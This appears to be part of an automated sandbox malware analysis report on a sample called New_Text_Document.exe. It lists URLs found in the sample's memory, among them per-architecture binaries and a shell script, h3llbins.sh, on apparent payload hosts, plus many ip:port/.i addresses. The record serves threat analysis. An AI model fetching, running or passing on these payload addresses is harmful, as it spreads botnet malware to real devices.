                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.192.173.7/xroot
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.109.121:48221/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.219.110.93:53487/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.219.130.63:53284/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.219.196.140:5131/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.219.237.158:58469/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.219.239.154:3766/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.30.149.182:16481/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.31.126.33:12335/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.31.126.33:12335/g
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.38.149.66:6633/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.38.222.98:19635/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.90.100.136:63888/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.90.165.23:44083/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.90.167.100:18111/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.112.182.150:59468/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/armv4l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/armv5l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/armv6l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/i586
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/i686
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/mipsel
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/powerpc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.179/sparc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/armv4l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/armv5l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/armv6l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/h3llbins.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/i586
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/i686
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/mipsel
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/powerpc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.79.79.180/sparc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.26.153.100:30977/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.109.227.64:5013/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.109.227.65:5013/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.176.19.160:43644/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.57.55.210:54699/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.75.88.177:34113/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.84.120.109:53707/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.1.162.40:38300/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.11.6.224:6558/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.160.119.210:38764/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.180.250.41:46358/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.186.153.121:45438/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.186.254.198:49921/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.241.151.182:46656/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.245.120.145:43446/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.250.98.123:27815/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.253.160.37:58987/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.80.31.20:8567/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.147.93.157:41039/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.169.168.177:28180/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.179.176.106:57053/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.230.16.241:24712/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.84.51.98:5889/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.95.120.155:53919/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.112.13.25:28941/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.201.141.144:60804/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.255.36.174:5365/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.59.92.28:19380/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.227.186:52678/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.15.208.104:47590/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.44.209.30:31980/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.61.114.203:35588/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.65.214.60:48073/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.90.86.241:6547/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.167.232.237:39536/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.167.240.200:24387/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.167.83.16:33861/.i
